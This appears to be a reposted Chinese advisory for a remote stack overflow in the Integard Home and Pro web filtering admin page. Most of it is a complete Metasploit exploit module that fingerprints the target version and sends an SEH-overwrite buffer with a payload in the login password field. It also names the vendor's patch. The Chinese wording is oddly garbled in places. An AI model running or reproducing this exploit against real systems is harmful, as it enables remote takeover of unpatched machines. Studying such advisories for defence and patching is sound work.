Integard Home和Pro HTTP恳求远程栈溢出漏洞及修复[网络技术]

影响版本:
Race River Integard Home 2.0.0.9021
Race River Integard Pro 2.2.0.9026漏洞描写:
Integard Home和Pro辨别是家用和企业级的上网内容监控和过滤系统.

Integard服务器18881端口上的管理页面存在栈溢出漏洞.远程攻击者可以通过在口令字段中供应超长字符串来触发这个溢出,招致完好掌握利用和操作系统.
<*参考
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-061-integard-home-and-pro-v2-remote-http-buffer-overflow-exploit/
http://secunia.com/advisories/41312/
*>
测试办法:

本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负!
class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end
 
    #Current version does not work with bind() type of payloads
    #meterpreter, windows/exec  etc works fine
 
    def exploit
        mytarget = target
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
            sock.put(get)
            data = sock.recv(1024)
                if (data =~ /Content-Length: 24584/)
                    print_status("[!] Found Version - Integard Home")
                    mytarget = self.targets[1]
                end
                if (data =~ /Content-Length: 23196/)
                    print_status("[!] Found Version - Integard Pro")
                    mytarget = self.targets[2]
                end
            sock.close
        end
        connect
        print_status("[!] Selected Target: #{mytarget.name}")
        print_status("[*] Building Buffer")
        pay = payload.encoded
        junk = rand_text_alpha_upper(3091 - pay.length)
        jmp = "\xE9\x2B\xF8\xFF\xFF"
        nseh = "\xEB\xF9\x90\x90"
        seh = [mytarget.ret].pack('V')
        buffer = junk + pay + jmp + nseh + seh
        print_status("[*] Sending Request")
        req = "POST /LoginAdmin HTTP/1.1\r\n"
        req << "Host: 192.168.2.129:18881\r\n"
        req << "Content-Length: 1074\r\n\r\n"
        req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
        sock.put(req)
        print_status("[*] Request Sent")
        sock.close
        handler
    end
end

厂商补钉:

Race River
----------
目前厂商已经公布了进级补钉以修复这个安全问题,请到厂商的主页下载:

http://www.integard.com.au/Release_Notes_Home.htm
http://www.integard.com.au/Release_Notes_Pro.htm